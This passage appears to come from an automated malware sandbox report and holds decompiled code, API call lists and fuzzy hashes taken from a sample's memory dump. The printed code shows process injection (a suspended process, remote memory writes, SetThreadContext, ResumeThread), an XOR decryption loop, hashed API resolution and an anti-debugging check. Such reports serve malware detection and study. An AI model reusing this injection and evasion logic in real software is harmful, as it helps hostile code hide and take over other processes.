								_t123 = E0233BF50(_t237, 0, 0x4bbc7e4);
								_t188 =  *_t123(_v68.hThread, _t155);
								E0233BF50(_t237, 0, 0xd1a4de8);
								_t196 = _t196 + 0x18;
								_t126 = VirtualProtectEx(_v68.hProcess, _t184, 0x42, 0x10,  &_v28); // executed
								if(_t126 == 1) {
									_t239 = _t188 - 1;
									_t172 = 1;
									_v712 = _t184;
									if(_t188 == 1) {
										E0233BF50(_t239, 0, E02339D50(0x60ce8748));
										_t196 = _t196 + 0xc;
										_t136 = SetThreadContext(_v68.hThread, _t155); // executed
										_t68 = _t136 != 1;
										_t241 = _t68;
										_t172 = 0 | _t68;
									}
									_t185 = _t172;
									_t188 = E0233BF50(_t241, 0, 0xd1a4de8);
									_t128 = E02339D50(0x647400ec);
									_t196 = _t196 + 0xc;
									_t129 = VirtualProtectEx(_v68.hProcess, _v24, _v36, _t128,  &_v28); // executed
									if(_t129 == 1) {
										_t243 = _t185;
										if(_t185 == 0) {
											E0233BF50(__eflags, 0, E02339D50(0x6f5727e8));
											_t196 = _t196 + 0xc;
											_push(_v68.hThread);
										} else {
											E0233BF50(_t243, 0, 0x68b1574);
											_t196 = _t196 + 8;
											_push(0);
											_push(0);
											_push(0);
											_push(_v20);
											_push(0);
											_push(0);
											_push(_v68);
										}
										ResumeThread(); // executed
									}
								}
							}
						}
					}
					goto L19;
				} else {
					_t157 = _v48;
					_t137 = 0;
					_v36 = _t180;
					_v72 = _t188;
					do {
						_v20 = _t137;
						 *(_t188 + _t137) =  *(_t188 + _t137) ^ _t157;
						_t139 = _t157 << 8;
						_v52 = _t139;
						_v44 =  !_t139;
						_v40 = E02333750(0,  !_t139, 0x9b6b004f);
						_v40 = E02332DC0(0, E02339D50(0xff1f00e3) &  !(_t157 >> 0x18), _t157 >> 0x00000018 & 0xffffffb0) ^ (_v52 & 0x6494ff00 | _v40);
						_t180 = _v36;
						_v44 = E023320A0(0, E02332DC0(0, _v44,  !(_t157 >> 0x18)), 0xffffffff);
						_t148 = E02339D50(0xff1f00e3);
						E02332DC0(0, _v52, _t157 >> 0x18);
						_t150 = E023322E0(0, 0, 1);
						_t207 = _t207 + 0x38;
						_v20 = _v20 - _t150;
						_t157 = (_t148 | 0x6494ffb0) & _v44 | _v40;
						_t188 = _v72;
						_t137 = _v20;
						_t234 = _t137 - _t180;
					} while (_t137 != _t180);
					goto L8;
				}
			}

0x0233ae40
0x0233ae4c
0x0233ae51
0x0233ae56
0x0233ae5b
0x0233ae60
0x0233ae65
0x0233ae6a
0x0233ae76
0x0233b2de
0x0233b2de
0x0233ae7c
0x0233ae81
0x0233ae88
0x0233b2b4
0x0233b2c4
0x0233b2ce
0x0233b2ce
0x0233ae9e
0x0233aea3
0x0233aea6
0x0233aeb8
0x0233aeba
0x0233aebf
0x0233aec1
0x0233aec4
0x00000000
0x00000000
0x0233aeca
0x0233aed3
0x0233aee1
0x0233aef1
0x0233aef9
0x0233af03
0x0233af12
0x0233af17
0x0233af2e
0x0233af30
0x0233af33
0x00000000
0x00000000
0x0233af44
0x0233af4d
0x0233af52
0x0233af62
0x0233af64
0x0233af66
0x00000000
0x00000000
0x0233af6c
0x0233af74
0x0233af77
0x0233af7d
0x0233af87
0x0233af91
0x0233af99
0x0233af9d
0x0233afa9
0x0233afae
0x0233afb1
0x0233afb8
0x0233afba
0x0233afbd
0x0233b08d
0x0233b08d
0x0233b09b
0x0233b0a0
0x0233b0af
0x0233b0b1
0x0233b0b4
0x0233b0ba
0x0233b0c3
0x0233b0c8
0x0233b0d9
0x0233b0db
0x0233b0dd
0x0233b0e7
0x0233b0ef
0x0233b0f2
0x0233b0f8
0x0233b0fb
0x0233b10b
0x0233b114
0x0233b11a
0x0233b11e
0x0233b13e
0x0233b146
0x0233b149
0x0233b153
0x0233b160
0x0233b176
0x0233b17d
0x0233b187
0x0233b18c
0x0233b19d
0x0233b19f
0x0233b1a2
0x0233b1a8
0x0233b1b0
0x0233b1b7
0x0233b1bf
0x0233b1d0
0x0233b1de
0x0233b1e7
0x0233b1ec
0x0233b1fb
0x0233b200
0x0233b206
0x0233b209
0x0233b20e
0x0233b214
0x0233b226
0x0233b22b
0x0233b232
0x0233b239
0x0233b239
0x0233b239
0x0233b239
0x0233b23c
0x0233b250
0x0233b257
0x0233b25c
0x0233b26b
0x0233b270
0x0233b272
0x0233b274
0x0233b2a7
0x0233b2ac
0x0233b2af
0x0233b276
0x0233b27d
0x0233b282
0x0233b285
0x0233b287
0x0233b289
0x0233b28b
0x0233b28e
0x0233b290
0x0233b292
0x0233b292
0x0233b2b2
0x0233b2b2
0x0233b270
0x0233b200
0x0233b1a2
0x0233b0dd
0x00000000
0x0233afc3
0x0233afc3
0x0233afc6
0x0233afc8
0x0233afcb
0x0233afd0
0x0233afd0
0x0233afd3
0x0233afdd
0x0233afe0
0x0233afe7
0x0233affb
0x0233b027
0x0233b02b
0x0233b044
0x0233b04c
0x0233b066
0x0233b072
0x0233b077
0x0233b07a
0x0233b07d
0x0233b07f
0x0233b082
0x0233b085
0x0233b085
0x00000000
0x0233afd0

APIs

VirtualAllocEx.KERNELBASE(?,00000000,00000000,00003000,00000004), ref: 0233AF62
WriteProcessMemory.KERNELBASE(?,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?), ref: 0233B0AF
VirtualAllocEx.KERNELBASE(?,00000000,00000042,00003000,00000004,?,?,?,?,?,?,?,?,?,?,?), ref: 0233B0D9
WriteProcessMemory.KERNELBASE(?,?,00000044,00000042,00000000), ref: 0233B19D
VirtualProtectEx.KERNELBASE(?,?,00000042,00000010,00000000), ref: 0233B1FB
SetThreadContext.KERNEL32(?,?), ref: 0233B232
VirtualProtectEx.KERNELBASE(?,?,?,00000000,00000000), ref: 0233B26B
ResumeThread.KERNELBASE(?), ref: 0233B2B2
CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 0233AF2E

Part of subcall function 0233BF50: LoadLibraryA.KERNEL32(?), ref: 0233C1A1

ExitProcess.KERNEL32(00000000), ref: 0233B2CE

Strings

D, xrefs: 0233AEE1

Memory Dump Source

Source File: 00000004.00000002.2160881633.0000000002331000.00000020.00020000.sdmp, Offset: 02330000, based on PE: true

Associated: 00000004.00000002.2160877703.0000000002330000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2160901061.0000000002350000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2160909033.0000000002352000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2160913197.0000000002355000.00000002.00020000.sdmp Download File

Similarity

API ID: ProcessVirtual$AllocMemoryProtectThreadWrite$ContextCreateExitLibraryLoadResume
String ID: D
API String ID: 2854380510-2746444292
Opcode ID: aadc072436c42b0b5909f8032beb18bb3ed1dcb9eb1f97abe8462896788fe354
Instruction ID: a3dcc453114d6fc0d303b7e53a038186800fa621b1b0ac23e50ac49b2122173c
Opcode Fuzzy Hash: aadc072436c42b0b5909f8032beb18bb3ed1dcb9eb1f97abe8462896788fe354
Instruction Fuzzy Hash: 2CC1E0B2D402186BEF21A7F4AC42FAEB676AF54705F140125F918F62C1EA716F148FB1

Uniqueness

Uniqueness Score: -1.00%

Function 02410D28, Relevance: 13.8, APIs: 9, Instructions: 318memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,00000920,00003000,00000040,00000920,02410780), ref: 02410DE5
VirtualAlloc.KERNEL32(00000000,000005EB,00003000,00000040,024107E1), ref: 02410E1C
VirtualAlloc.KERNEL32(00000000,00022439,00003000,00000040), ref: 02410E7C
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 02410EB2
VirtualProtect.KERNEL32(02330000,00000000,00000004,02410D07), ref: 02410FB7
VirtualProtect.KERNEL32(02330000,00001000,00000004,02410D07), ref: 02410FDE
VirtualProtect.KERNEL32(00000000,?,00000002,02410D07), ref: 024110AB
VirtualProtect.KERNEL32(00000000,?,00000002,02410D07,?), ref: 02411101
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0241111D

Memory Dump Source

Source File: 00000004.00000002.2160977472.0000000002410000.00000040.00020000.sdmp, Offset: 02410000, based on PE: false

Similarity

API ID: Virtual$Protect$Alloc$Free
String ID:
API String ID: 2574235972-0
Opcode ID: 046c22bfd6cc6457a861a1a9c923bc078a3a1c54b33ff9aed95f43ed8304fc38
Instruction ID: fceb1b26254a5706ada49359e64df670da8921e9114d61981383a77ee2c2825f
Opcode Fuzzy Hash: 046c22bfd6cc6457a861a1a9c923bc078a3a1c54b33ff9aed95f43ed8304fc38
Instruction Fuzzy Hash: 24D16D726002809FFB15CF54C881B5A77AAFFC8310B295199ED899F35EDB70B850CB66

Uniqueness

Uniqueness Score: -1.00%

Function 0234DA20, Relevance: 6.0, APIs: 4, Instructions: 27
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0234DA20() {
				char _v28;
				void* _t4;

				_t4 = CreateEventW(0, 1, 0, E02337200(0x23505f8,  &_v28));
				if(_t4 != 0) {
					SetEvent(_t4);
					_t4 = CloseHandle(_t4); // executed
				}
				SetLastError(0);
				return _t4;
			}

0x0234da3f
0x0234da47
0x0234da4c
0x0234da53
0x0234da53
0x0234da5b
0x0234da66

APIs

CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,0CD06773,?,-02351D33,?,023391EB,-02351D33,?,023377A1,00000001), ref: 0234DA3F
SetEvent.KERNEL32(00000000,?,?,0CD06773,?,-02351D33,?,023391EB,-02351D33,?,023377A1,00000001,?,-02351D33,?,02336A74), ref: 0234DA4C
CloseHandle.KERNEL32(00000000), ref: 0234DA53
SetLastError.KERNEL32(00000000,?,?,0CD06773,?,-02351D33,?,023391EB,-02351D33,?,023377A1,00000001,?,-02351D33,?,02336A74), ref: 0234DA5B

Memory Dump Source

Source File: 00000004.00000002.2160881633.0000000002331000.00000020.00020000.sdmp, Offset: 02330000, based on PE: true

Associated: 00000004.00000002.2160877703.0000000002330000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2160901061.0000000002350000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2160909033.0000000002352000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2160913197.0000000002355000.00000002.00020000.sdmp Download File

Similarity

API ID: Event$CloseCreateErrorHandleLast
String ID:
API String ID: 2055590504-0
Opcode ID: 76babcd03c76a8d781bab4283646597b58f3d774f5794c74d8a84748c1552946
Instruction ID: 89b9e8622565caec66b4d69c7eb8334fd326fa8904b3a8146ff807bec83f9b18
Opcode Fuzzy Hash: 76babcd03c76a8d781bab4283646597b58f3d774f5794c74d8a84748c1552946
Instruction Fuzzy Hash: EBE0D8F1AC032467E25036F46C0AFAA362CAF08742F040450FF0DDA080E6565460C7B5

Uniqueness

Uniqueness Score: -1.00%

Function 023F914E, Relevance: 3.0, APIs: 2, Instructions: 28memoryCOMMON

Download Yara Rule

APIs

HeapCreate.KERNELBASE(00000000,00001000,00000000,023F6F5C,00000001), ref: 023F915F
HeapDestroy.KERNEL32 ref: 023F9195

Memory Dump Source

Source File: 00000004.00000002.2160916994.0000000002356000.00000020.00020000.sdmp, Offset: 02356000, based on PE: false

Similarity

API ID: Heap$CreateDestroy
String ID:
API String ID: 3296620671-0
Opcode ID: d0635dff1ddc7c5b5ed44f3218be927c2f3243a1c73349e70366018184327c8a
Instruction ID: 7abc01096f726be2e4c58d3e36a6988a734a97869ab6a8674c95cf2dcf4d70aa
Opcode Fuzzy Hash: d0635dff1ddc7c5b5ed44f3218be927c2f3243a1c73349e70366018184327c8a
Instruction Fuzzy Hash: 9AE06D72EE43019EEBA89B71BD48B2A7598EB4475AF108C39E201C5880EB708165BE08

Uniqueness

Uniqueness Score: -1.00%

Function 0234D770, Relevance: 3.0, APIs: 2, Instructions: 14
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0234D770() {
				char _v22;

				GetConsoleCP();
				GetFileAttributesW(E02337200(0x23505f8,  &_v22)); // executed
				return GetCapture();
			}

0x0234d776
0x0234d78e
0x0234d798

APIs

GetConsoleCP.KERNEL32 ref: 0234D776
GetFileAttributesW.KERNELBASE(00000000,?,?,?,?,?,?,0233AE51), ref: 0234D78E

Memory Dump Source

Source File: 00000004.00000002.2160881633.0000000002331000.00000020.00020000.sdmp, Offset: 02330000, based on PE: true

Associated: 00000004.00000002.2160877703.0000000002330000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2160901061.0000000002350000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2160909033.0000000002352000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2160913197.0000000002355000.00000002.00020000.sdmp Download File

Similarity

API ID: AttributesConsoleFile
String ID:
API String ID: 1533235433-0
Opcode ID: add96b303e2ebf2ade3e28e8434edf3e6d48756be95d8a8738ee9b2bf6bacfbd
Instruction ID: a45aa9abd2c4237da428714f2d587ce4b25cd7e376528bb3c00e7e817db9c56a
Opcode Fuzzy Hash: add96b303e2ebf2ade3e28e8434edf3e6d48756be95d8a8738ee9b2bf6bacfbd
Instruction Fuzzy Hash: 90D0C9F1C84219ABD64437A8A80EC2A776CAE08306F450860ED1E96102E52A95B88BB6

Uniqueness

Uniqueness Score: -1.00%

Function 0234B1B0, Relevance: 1.5, APIs: 1, Instructions: 23
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0234B1B0(intOrPtr _a4) {
				void* _t5;
				void* _t7;
				intOrPtr _t8;

				_t8 = _a4;
				_t13 = _t8;
				if(_t8 == 0) {
					__eflags = 0;
					return 0;
				}
				_t5 = E02339D50(0xfef6f706);
				E0233BF50(_t13, 0, 0x8685de3);
				_t7 = RtlAllocateHeap( *0x2352124, 0, _t8 + _t5 + 0x657d085a); // executed
				return _t7;
			}

0x0234b1b4
0x0234b1b7
0x0234b1b9
0x0234b1eb
0x00000000
0x0234b1eb
0x0234b1c0
0x0234b1d6
0x0234b1e7
0x00000000

APIs

RtlAllocateHeap.NTDLL(00000000,?,?,?,00000000,?), ref: 0234B1E7

Memory Dump Source

Source File: 00000004.00000002.2160881633.0000000002331000.00000020.00020000.sdmp, Offset: 02330000, based on PE: true

Associated: 00000004.00000002.2160877703.0000000002330000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2160901061.0000000002350000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2160909033.0000000002352000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2160913197.0000000002355000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 9d12b484fde4e494c21bd2fc8bf3750f41685b6f68fb2810c5ff2ec02eef7904
Instruction ID: 9b781fe634fb3995126fe14d7ac574afccd0f80ffa39b774cdc79c2d2bfb9f1e
Opcode Fuzzy Hash: 9d12b484fde4e494c21bd2fc8bf3750f41685b6f68fb2810c5ff2ec02eef7904
Instruction Fuzzy Hash: 53E0C273D44228BBC72236D0BC12F9BBB8D8F05B69F050421FE0DA7151EA41B7108AE1

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 023469A0, Relevance: 7.6, APIs: 5, Instructions: 65
threadprocessCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E023469A0(void* __eflags) {
				intOrPtr _v32;
				signed int _v36;
				void* _v44;
				signed char _t13;
				signed int _t16;
				signed int _t19;
				long _t23;
				void* _t24;
				void* _t25;
				void* _t27;

				_t24 = CreateToolhelp32Snapshot(4, 0);
				_v44 = E02339D50(0x647400b0);
				_t23 = GetCurrentProcessId();
				_t13 = E023355C0(Thread32First(_t24,  &_v44), 0);
				_t27 = _t25 + 0xc;
				if((_t13 & 0x00000001) != 0) {
					L6:
					_t19 = 0;
				} else {
					0;
					0;
					while(GetLastError() != 0x12) {
						_t16 = E023355C0(_v32, _t23);
						_t27 = _t27 + 8;
						_t19 =  ~(_t16 & 0x00000001) & _v36;
						if(Thread32Next(_t24,  &_v44) != 0) {
							if(_t19 == 0) {
								continue;
							} else {
							}
						}
						goto L7;
					}
					goto L6;
				}
				L7:
				return _t19;
			}

0x023469b2
0x023469c1
0x023469ca
0x023469d9
0x023469de
0x023469e3
0x02346a25
0x02346a25
0x023469eb
0x023469eb
0x023469ef
0x023469f0
0x023469ff
0x02346a04
0x02346a11
0x02346a1d
0x02346a21
0x00000000
0x00000000
0x02346a23
0x02346a21
0x00000000
0x02346a1d
0x00000000
0x023469f0
0x02346a27
0x02346a30

APIs

CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 023469AD
GetCurrentProcessId.KERNEL32 ref: 023469C4
Thread32First.KERNEL32(00000000,?), ref: 023469D1
GetLastError.KERNEL32 ref: 023469F0
Thread32Next.KERNEL32(00000000,?), ref: 02346A16

Memory Dump Source

Source File: 00000004.00000002.2160881633.0000000002331000.00000020.00020000.sdmp, Offset: 02330000, based on PE: true

Associated: 00000004.00000002.2160877703.0000000002330000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2160901061.0000000002350000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2160909033.0000000002352000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2160913197.0000000002355000.00000002.00020000.sdmp Download File

Similarity

API ID: Thread32$CreateCurrentErrorFirstLastNextProcessSnapshotToolhelp32
String ID:
API String ID: 1709709923-0
Opcode ID: 9be8c5ac6566b581b8274a05023479973972032dfd8a8986d3d1f30e4f814ceb
Instruction ID: 2723ffda9517cabdcca16421aa176bf2bebf53c650dd5caeecffc623fce91b5c
Opcode Fuzzy Hash: 9be8c5ac6566b581b8274a05023479973972032dfd8a8986d3d1f30e4f814ceb
Instruction Fuzzy Hash: B6012BF3D8030467DB217AE4AC86FEF3EADEF46315F480171E90AA2202EE15B9548971

Uniqueness

Uniqueness Score: -1.00%

Function 023FABA4, Relevance: 7.6, APIs: 5, Instructions: 57COMMON

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32 ref: 023FED8D
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 023FEDA2
UnhandledExceptionFilter.KERNEL32(0240DBB4), ref: 023FEDAD
GetCurrentProcess.KERNEL32(C0000409), ref: 023FEDC9
TerminateProcess.KERNEL32(00000000), ref: 023FEDD0

Memory Dump Source

Source File: 00000004.00000002.2160916994.0000000002356000.00000020.00020000.sdmp, Offset: 02356000, based on PE: false

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
String ID:
API String ID: 2579439406-0
Opcode ID: 11602a43b9985c8f6e902415fc5fcbc5cd48a82f1878ceae7a5982606b1ea5f1
Instruction ID: 4ba1c7f0315db9ac53b779e584940faf782e582318e4a404631a12c19cce3abf
Opcode Fuzzy Hash: 11602a43b9985c8f6e902415fc5fcbc5cd48a82f1878ceae7a5982606b1ea5f1
Instruction Fuzzy Hash: 5C212874C81308EFC36DDF26F9847587BB0FB48314FC2581AE90987645EBB059A98F99

Uniqueness

Uniqueness Score: -1.00%

Function 0233D830, Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 280
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 97%

			E0233D830(signed int _a4, intOrPtr _a8) {
				signed short* _v20;
				CHAR* _v24;
				char _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				signed int _v40;
				char _v140;
				void* _t78;
				void* _t79;
				void* _t83;
				void* _t93;
				signed short* _t100;
				signed short* _t102;
				void* _t105;
				void* _t112;
				char _t113;
				signed short* _t114;
				void* _t115;
				void* _t120;
				signed int _t122;
				signed int _t124;
				signed int _t133;
				void* _t135;
				intOrPtr _t136;
				signed int _t137;
				signed int _t139;
				_Unknown_base(*)()* _t141;
				char* _t143;
				signed int _t144;
				void* _t149;
				signed short* _t153;
				signed int _t155;
				intOrPtr _t159;
				void* _t160;
				signed char* _t161;
				void* _t165;
				intOrPtr _t166;
				_Unknown_base(*)()* _t170;
				signed short* _t173;
				CHAR* _t174;
				signed int _t175;
				void* _t176;
				void* _t177;
				void* _t178;
				void* _t180;
				void* _t183;
				void* _t187;
				void* _t191;
				void* _t192;
				void* _t199;

				_t133 = _a4;
				_t141 = 0;
				_t204 = _t133;
				if(_t133 != 0) {
					_t78 = E023412D0(_t204, _t133);
					_t149 = _t78;
					_t165 =  *((intOrPtr*)(_t78 + 0x60)) + _t133;
					_t79 = E02339D50(0x975b6640);
					_t141 = 0;
					_t180 = _t178 + 8;
					_t205 =  *((intOrPtr*)(_t79 + _t165 + 0xcd0992c));
					if( *((intOrPtr*)(_t79 + _t165 + 0xcd0992c)) != 0) {
						_t6 = _t165 + 0xcd09914; // 0xcd09914
						_t166 = _t79 + _t6;
						_v36 =  *((intOrPtr*)(_t149 + 0x64));
						_t153 =  *((intOrPtr*)(_t166 + 0x24)) + _t133 - E02339D50(0x60421690) + 0x436163c;
						_v32 = _t166;
						_t83 = E02331460(_t205, E02331460(_t205,  *((intOrPtr*)(_t166 + 0x20)), 0x5eaee274), _t133);
						_t183 = _t180 + 0x14;
						_v40 =  ~_t133;
						_t143 = _t83 + 0xa1511d8c;
						_t135 = 0;
						0;
						do {
							_v20 = _t153;
							_v24 = _t143;
							_t155 =  ~(E02331460(0,  ~( *_t143), _v40));
							E02331460(0,  *_t143, _a4);
							E02348F20( &_v140, E02339D50(0x647400c8));
							_t187 = _t183 + 0x1c;
							_t91 =  *_t155;
							if( *_t155 != 0) {
								_t176 = 0;
								do {
									 *((char*)(_t177 + _t176 - 0x88)) = E0234D680(0, _t91);
									_t176 = _t176 - E023322E0(0, 0, 1);
									E02331460(0, _t176, 1);
									_t187 = _t187 + 0x14;
									_t91 =  *(_t155 + _t176) & 0x000000ff;
								} while (( *(_t155 + _t176) & 0x000000ff) != 0);
							}
							_push(0xffffffff);
							_t93 = E023400A0( &_v140);
							_t183 = _t187 + 8;
							if(_t93 == _a8) {
								_t136 = _v32;
								_t170 = E02331460(__eflags, 0x637bf4a0 +  *((intOrPtr*)( *((intOrPtr*)(_t136 + 0x1c)) + _a4 - E02339D50(0xffb90b0) + 0x6b8f901c + ( *_v20 & 0x0000ffff) * 4)), _a4) + 0x9c840b60;
								_t100 = E023322E0(__eflags, _t136, 0x52cc09fc);
								_t159 = _v36;
								_v20 = _t100;
								E02331460(__eflags, _t136, _t159);
								_t141 = _t170;
								_t191 = _t183 + 0x1c;
								__eflags = _t170 - _t136;
								if(_t170 > _t136) {
									_t102 = _v20;
									__eflags = _t141 - _t159 + _t102 + 0x52cc09fc;
									if(_t141 < _t159 + _t102 + 0x52cc09fc) {
										_v24 =  *_t141;
										_v20 = _t141;
										_t105 = E02337DD0(0x82);
										_t192 = _t191 + 4;
										_t144 = _v24;
										_t137 = 0;
										__eflags = _t144 - _t105;
										if(_t144 != _t105) {
											_t122 = _t144;
											_t175 = 0;
											__eflags = 0;
											0;
											do {
												 *(_t177 + _t175 - 0x88) = _t122;
												_t124 = E02331460(__eflags, E023322E0(__eflags, 0, _t175), 0xffffffff);
												_t137 =  ~_t124;
												E02331460(__eflags, _t175, 1);
												_t192 = _t192 + 0x18;
												_t175 = _t137;
												_t122 =  *(_v20 - _t124) & 0x000000ff;
												__eflags = _t122 - 0x2e;
											} while (__eflags != 0);
										}
										_t160 = E02331460(__eflags, _t137, E02339D50(0x3638cbc4));
										E02331460(__eflags, _t137, 1);
										_v24 = _v20 + _t160 - 0x524ccb67;
										 *((char*)(_t177 + _t137 - 0x88)) = E02337DD0(0x82);
										 *((char*)(_t177 + _t160 - 0x524ccbef)) = 0x64;
										_t112 = E02339D50(0x8707952b);
										 *((char*)(_t177 + _t137 - 0x86)) = 0x6c;
										_t113 = E02337DD0(0xc0);
										_v28 = 0;
										 *((char*)(_t137 - _t112 +  &_v140 - 0x1c8c6a76)) = _t113;
										_t114 = _v20;
										 *((char*)(_t177 + _t137 - 0x84)) = 0;
										_t173 = _t114;
										_t115 = E02337DD0(0x8f);
										_t199 = _t192 + 0x24;
										__eflags =  *((intOrPtr*)(_t114 + _t160 - 0x524ccb67)) - _t115;
										if( *((intOrPtr*)(_t114 + _t160 - 0x524ccb67)) != _t115) {
											_t174 = _v24;
										} else {
											_t139 = _v24[1];
											__eflags = _t139;
											if(_t139 == 0) {
												_t174 =  &_v28;
											} else {
												_t161 = _t160 + _t173 - 0x524ccb65;
												do {
													_t120 = E023355A0(_v28, 0xa);
													_t199 = _t199 + 8;
													_v28 = _t139 + _t120 - 0x30;
													_t139 =  *_t161 & 0x000000ff;
													_t161 =  &(_t161[1]);
													__eflags = _t139;
												} while (_t139 != 0);
												_t174 =  &_v28;
											}
										}
										_t141 = GetProcAddress(LoadLibraryA( &_v140), _t174);
									}
								}
							} else {
								goto L7;
							}
							goto L22;
							L7:
							_t135 = _t135 + 1;
							_t143 =  &(_v24[4]);
							_t153 =  &(_v20[1]);
						} while (_t135 <  *((intOrPtr*)(_v32 + 0x18)));
						_t141 = 0;
					}
				}
				L22:
				return _t141;
			}

0x0233d839
0x0233d83c
0x0233d83e
0x0233d840
0x0233d847
0x0233d852
0x0233d854
0x0233d85b
0x0233d860
0x0233d862
0x0233d865
0x0233d86d
0x0233d873
0x0233d873
0x0233d880
0x0233d894
0x0233d89f
0x0233d8af
0x0233d8b4
0x0233d8bb
0x0233d8be
0x0233d8c4
0x0233d8cc
0x0233d8d0
0x0233d8d2
0x0233d8d5
0x0233d8ea
0x0233d8f0
0x0233d90d
0x0233d912
0x0233d915
0x0233d919
0x0233d91b
0x0233d920
0x0233d92c
0x0233d942
0x0233d944
0x0233d949
0x0233d94c
0x0233d950
0x0233d920
0x0233d954
0x0233d95d
0x0233d962
0x0233d968
0x0233d98d
0x0233d9c4
0x0233d9d0
0x0233d9d8
0x0233d9db
0x0233d9e0
0x0233d9e5
0x0233d9e7
0x0233d9ea
0x0233d9ec
0x0233d9f2
0x0233d9fc
0x0233d9fe
0x0233da06
0x0233da0e
0x0233da11
0x0233da16
0x0233da19
0x0233da1c
0x0233da1e
0x0233da20
0x0233da22
0x0233da24
0x0233da24
0x0233da2c
0x0233da30
0x0233da30
0x0233da45
0x0233da51
0x0233da56
0x0233da5b
0x0233da61
0x0233da65
0x0233da68
0x0233da68
0x0233da30
0x0233da83
0x0233da88
0x0233da9a
0x0233daaa
0x0233dab1
0x0233dabe
0x0233dac8
0x0233dad7
0x0233dae5
0x0233daec
0x0233daf3
0x0233daf6
0x0233db05
0x0233db0c
0x0233db11
0x0233db14
0x0233db16
0x0233db54
0x0233db18
0x0233db1e
0x0233db21
0x0233db23
0x0233db59
0x0233db25
0x0233db25
0x0233db30
0x0233db35
0x0233db3a
0x0233db44
0x0233db47
0x0233db4a
0x0233db4b
0x0233db4b
0x0233db4f
0x0233db4f
0x0233db23
0x0233db70
0x0233db70
0x0233d9fe
0x00000000
0x00000000
0x00000000
0x00000000
0x0233d96a
0x0233d973
0x0233d974
0x0233d977
0x0233d97a
0x0233d983
0x0233d983
0x0233d86d
0x0233db72
0x0233db7b

APIs

LoadLibraryA.KERNEL32(?), ref: 0233DB62
GetProcAddress.KERNEL32(00000000,?), ref: 0233DB6A

Strings

l, xrefs: 0233DAC8
d, xrefs: 0233DAB1

Memory Dump Source

Source File: 00000004.00000002.2160881633.0000000002331000.00000020.00020000.sdmp, Offset: 02330000, based on PE: true

Associated: 00000004.00000002.2160877703.0000000002330000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2160901061.0000000002350000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2160909033.0000000002352000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2160913197.0000000002355000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressLibraryLoadProc
String ID: d$l
API String ID: 2574300362-91452987
Opcode ID: 7aa04dcc660932f1187477a2be26bb67bc78b5641d45f092d8e92edc4ad15fc8
Instruction ID: ab54dc1820b14327feb4dd3562333cb12b5e22f7161b8244435aef3f7b5ef032
Opcode Fuzzy Hash: 7aa04dcc660932f1187477a2be26bb67bc78b5641d45f092d8e92edc4ad15fc8
Instruction Fuzzy Hash: 3E910BB6D002199BDB219FB4AC41BFE7BB5AF15358F440065EC89B7342E731AB14CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 02331A00, Relevance: 3.0, APIs: 2, Instructions: 32
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E02331A00() {
				intOrPtr _t9;
				WCHAR* _t10;
				struct HINSTANCE__* _t15;

				_t9 =  *0x23520d8; // 0x53325ec4
				_t10 = _t9 + 0xffffffd4;
				_t15 = (_t10 | 0x00000008) * _t10;
				CreateDialogParamW(_t15, _t10, _t15, _t15, _t15);
				GetVersion();
				return (_t10 * (_t15 + (_t15 + _t15 ^ 0x00000032) | _t10) ^ 0xffffffb4) + (_t15 + (_t15 + _t15 ^ 0x00000032) | _t10);
			}

0x02331a06
0x02331a0c
0x02331a15
0x02331a1d
0x02331a39
0x02331a47

APIs

CreateDialogParamW.USER32 ref: 02331A1D
GetVersion.KERNEL32(?,02338614,0000031F,?,02336AB1,?,0233AE51), ref: 02331A39

Memory Dump Source

Source File: 00000004.00000002.2160881633.0000000002331000.00000020.00020000.sdmp, Offset: 02330000, based on PE: true

Associated: 00000004.00000002.2160877703.0000000002330000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2160901061.0000000002350000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2160909033.0000000002352000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2160913197.0000000002355000.00000002.00020000.sdmp Download File

Similarity

API ID: CreateDialogParamVersion
String ID:
API String ID: 1068622756-0
Opcode ID: 4d5c229dbaf3eaa2d56b0d512ea25ef90be6aac623e9f0672f64e2720e34f3aa
Instruction ID: 83c4449d7af237752a2812ecf46533d1b9e0a653b8cfabddf8e7809f0965d535
